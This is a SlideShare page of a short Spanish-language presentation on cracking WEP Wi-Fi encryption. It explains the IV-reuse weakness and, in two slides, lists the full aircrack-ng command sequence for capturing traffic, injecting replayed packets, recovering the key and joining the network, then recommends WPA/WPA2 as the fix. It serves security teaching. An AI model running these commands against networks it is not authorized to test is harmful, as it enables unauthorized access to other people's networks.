Cracking WEP

5,642 views

Published on

Presentación realizada por Jesus Bolivar (@jesusbolivar - twitter).

Published in: Technology
1 Comment
4 Likes
Statistics
Notes
No Downloads
Views
Total views
5,642
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
216
Comments
1
Likes
4
Embeds 0
No embeds

No notes for slide

Cracking WEP

  1. 1. Cracking WEP<br />
  2. 2. WEP – WiredEquivalentPrivacy<br />Protocolo de encriptación <br />5/13 caracteres ASCII o 10/26 caracteres hexadecimales <br />Vulnerabilidades descubiertas en 2001<br />Sustituido por WPA (Wi-Fi Protected Access) en 2003<br />Declarado obsoleto en 2004<br />
  3. 3. El Problema<br />Protocolo defectuoso<br />40/104 bits de clave + 24 bits de vector de inicialización<br />50 % de probabilidad de que un VI se repita después de 5000 paquetes<br />El numero máximo de VIs diferentes es limitado<br />
  4. 4. El Ataque<br />Hacer que el Access Point agote los VIs posibles<br />Recolectar 50.000+ VIs<br />Conseguir la clave utilizando un método estadístico <br />Tiempo de ejecución 5-15 min<br />
  5. 5. El Ataque<br />airmon-ngstart wlan0<br />airodump-ng -c canal -w test --encryptwep mon0<br />aireplay-ng -3 -b mac_ap -h mac_cliente_conectado wlan0<br />aircrack-ng -e nombrered test*.cap <br />
  6. 6. El Ataque<br />airmon-ng stop mon0<br />airmon-ng stop wlan0<br />ifconfig wlan0 down<br />iwconfig wlan0 channel x essidnombreredkey s:clave modemanaged<br />ifconfig wlan0 up<br />servicenetworkingrestart<br />
  7. 7. The Tools<br />BackTrack 4<br />Suite Aircrack-ng<br />Tarjeta inalámbrica soportada o paciencia… en algunos casos :)<br />
  8. 8. El Remedio<br />WPA/WPA2<br />IPSec<br />WEP en Modo Open (solo un poco mas seguro que WEP)<br />
  9. 9. Sources<br />http://www.aircrack-ng.org/doku.php<br />http://www.backtrack-linux.org<br />http://es.wikipedia.org/wiki/WEP<br />

×